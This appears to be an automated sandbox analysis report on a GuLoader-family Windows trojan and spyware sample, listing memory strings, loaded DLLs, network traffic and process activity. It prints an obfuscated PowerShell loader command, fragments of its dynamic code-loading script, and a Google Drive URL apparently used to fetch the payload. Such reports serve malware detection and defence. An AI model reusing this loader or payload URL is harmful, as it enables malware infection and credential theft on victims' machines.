          Source: msiexec.exe, 00000009.00000003.2131753724.00000000075EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2131692317.00000000075EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1wmwZCb5HsLP8Yqdvke2hD-vN5VaKU3NI&export=download
          Source: msiexec.exe, 00000009.00000002.2653650551.00000000075D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1wmwZCb5HsLP8Yqdvke2hD-vN5VaKU3NI&export=downloadT
          Source: msiexec.exe, 00000009.00000002.2653650551.00000000075BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1wmwZCb5HsLP8Yqdvke2hD-vN5VaKU3NI&export=downloads
          Source: msiexec.exe, 00000009.00000002.2667049605.0000000024091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: msiexec.exe, 00000009.00000002.2667049605.0000000024091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: msiexec.exe, 00000009.00000002.2667049605.0000000024091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: powershell.exe, 00000002.00000002.2012024518.00000000053C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000002.00000002.2018085249.00000000062DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: msiexec.exe, 00000009.00000002.2665789154.00000000230BB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2665789154.000000002312B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2665789154.0000000023152000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
          Source: msiexec.exe, 00000009.00000002.2665789154.00000000230BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
          Source: msiexec.exe, 00000009.00000002.2665789154.0000000023152000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
          Source: msiexec.exe, 00000009.00000002.2665789154.00000000230E5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2665789154.000000002312B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2665789154.0000000023152000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
          Source: msiexec.exe, 00000009.00000003.2131753724.00000000075EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2131692317.00000000075EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
          Source: msiexec.exe, 00000009.00000002.2653650551.00000000075D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2131753724.00000000075EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2131692317.00000000075EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
          Source: msiexec.exe, 00000009.00000002.2653650551.00000000075D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2131753724.00000000075EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2131692317.00000000075EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
          Source: msiexec.exe, 00000009.00000002.2667049605.0000000024091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: msiexec.exe, 00000009.00000002.2653650551.00000000075D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2131753724.00000000075EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2131692317.00000000075EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
          Source: msiexec.exe, 00000009.00000003.2131753724.00000000075EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2131692317.00000000075EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
          Source: msiexec.exe, 00000009.00000003.2131753724.00000000075EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2131692317.00000000075EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
          Source: msiexec.exe, 00000009.00000002.2667049605.0000000024091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: msiexec.exe, 00000009.00000003.2131753724.00000000075EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2131692317.00000000075EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
          Source: msiexec.exe, 00000009.00000003.2131753724.00000000075EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2131692317.00000000075EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
          Source: msiexec.exe, 00000009.00000002.2665789154.000000002325F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2665789154.0000000023250000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
          Source: msiexec.exe, 00000009.00000002.2665789154.000000002325A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
          Source: msiexec.exe, 00000009.00000002.2665789154.0000000023250000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/p
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
          Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.8:49709 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.8:49710 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49728 version: TLS 1.2
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeCode function: 0_2_00404FE4 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404FE4

          System Summary

          barindex
          Powershell drops PE file
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\HVSU7GbA5N.exeJump to dropped file
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeCode function: 0_2_004030B6 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_004030B6
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeCode function: 0_2_004048230_2_00404823
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeCode function: 0_2_004061970_2_00406197
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07D2C4DE2_2_07D2C4DE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_02D5D2789_2_02D5D278
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_02D553709_2_02D55370
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_02D5C1469_2_02D5C146
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_02D5C7389_2_02D5C738
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_02D5C4689_2_02D5C468
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_02D5CA089_2_02D5CA08
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_02D5E9889_2_02D5E988
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_02D5CFA99_2_02D5CFA9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_02D5CCD89_2_02D5CCD8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_02D5A0889_2_02D5A088
          Source: HVSU7GbA5N.exe, 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamedeliberationens imporosity.exe4 vs HVSU7GbA5N.exe
          Source: HVSU7GbA5N.exeBinary or memory string: OriginalFilenamedeliberationens imporosity.exe4 vs HVSU7GbA5N.exe
          Source: HVSU7GbA5N.exe.2.drBinary or memory string: OriginalFilenamedeliberationens imporosity.exe4 vs HVSU7GbA5N.exe
          Source: HVSU7GbA5N.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/11@5/5
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeCode function: 0_2_004042B1 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004042B1
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeCode function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,0_2_00402036
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeFile created: C:\Users\user\AppData\Local\Chillum19Jump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7652:120:WilError_03
          Source: C:\Windows\SysWOW64\msiexec.exeMutant created: NULL
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeFile created: C:\Users\user\AppData\Local\Temp\nslFBE7.tmpJump to behavior
          Source: HVSU7GbA5N.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: HVSU7GbA5N.exeReversingLabs: Detection: 31%
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeFile read: C:\Users\user\Desktop\HVSU7GbA5N.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\HVSU7GbA5N.exe "C:\Users\user\Desktop\HVSU7GbA5N.exe"
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Delfisk=Get-Content -Raw 'C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\Sprngningen178.Gte';$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Delfisk=Get-Content -Raw 'C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\Sprngningen178.Gte';$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)" Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeSection loaded: riched20.dllJump to behavior
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeSection loaded: usp10.dllJump to behavior
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: HVSU7GbA5N.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: e.pdb0:lp source: powershell.exe, 00000002.00000002.2031388759.0000000008BC1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb53 source: powershell.exe, 00000002.00000002.2011151339.0000000003575000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: s\System.Core.pdbw,l source: powershell.exe, 00000002.00000002.2031388759.0000000008BC1000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Yara detected GuLoader
          Source: Yara matchFile source: 00000002.00000002.2032574742.000000000A644000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Found suspicious powershell code related to unpacking or dynamic code loading
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Glucosidically $Hydrodynamic $Fladblgene187), (Showboater @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Albarium = [AppDomain]::CurrentDomain.GetAssembli
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Paragrafrytterens)), $Syningshaller).DefineDynamicModule($Overbevisendes, $false).DefineType($ypperst, $Opgavest, [System.MulticastDel
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeCode function: 0_2_00405EE8 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405EE8
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04DCE9F8 push eax; mov dword ptr [esp], edx2_2_04DCEA0C
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07D2A116 push ebx; retf 2_2_07D2A11D
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07D20FC4 push es; iretd 2_2_07D20FC7
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07D2F58C push ecx; iretd 2_2_07D2F58E
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07D2F3D6 push ecx; iretd 2_2_07D2F3E6
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_09A939C1 push 8BD38B50h; iretd 2_2_09A939C6
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_09A905AC push edx; iretd 2_2_09A905B8
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_09A90459 push edx; iretd 2_2_09A90475
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_09A9061F push 8BD68B50h; retf 2_2_09A90627
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\HVSU7GbA5N.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Loading BitLocker PowerShell Module
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
